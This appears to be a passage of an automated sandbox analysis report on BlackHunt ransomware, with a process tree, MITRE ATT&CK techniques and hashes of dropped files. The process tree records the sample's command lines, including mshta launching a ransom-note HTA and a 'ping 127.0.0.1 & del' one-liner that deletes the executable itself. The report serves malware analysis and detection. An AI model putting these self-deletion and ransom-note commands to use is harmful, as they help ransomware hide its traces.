PID:7244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:7964
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:7312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:1732 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:17692
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 17692 -s 14564⤵
- Program crash
PID:17576
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe"2⤵PID:18332
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:7988
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:10772
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:12192
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:11116
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:13740
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 17692 -ip 176921⤵PID:8544
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD55e9f627a4788fefbe57c933093828f74
SHA142a128fef56971c6fd9922a44b9e3db36cde80d3
SHA2563f2b245abfe30b3987889242b0e710361f1cd85375f0c0c2420d8cbe28052128
SHA512059a5d52fc7072f338622592240a6b569416d7248839d97c9064bf87cb1ed6397e045fccf0ce3a3ed690de238d2bfdc06ce3239c7084d9f18e52e8546397abe3
-
Filesize
12KB
MD5b428fa6a2358bb87225d3bd3e5818955
SHA197e740c631bdf8488a7c30be2d37c388050f64b7
SHA25621ab81caea1efb5b50ac5e98b2ebb48650a465b9d35045a45c44d88f243723af
SHA512f242063c2c38ea66dde5ba3abd4aab164a0d1a5c25bdd8d12b3eab95707dc9ccba3156541bb8a5401714db9f6ad4049c6db2541553fb741e86f6bbf3794c2f85
-
Filesize
684B
MD5feefce1cfad1420ac9966cdb7260c92d
SHA10d82ea0d08696e7a331be703b2d8201d31f31626
SHA2560ee3ed124ca10f53f13ef18b3f8ade760153ce03dd1edc3d862a83389cd98d73
SHA512b060f5190c1107fbb924d9c1cbf2f4d0c68ecd9287aa56b84ae6c6815d4d7376b1fae782f67ace7a7bf72e1e6c5408950972d7a55f24bd126a82e1e31616e8aa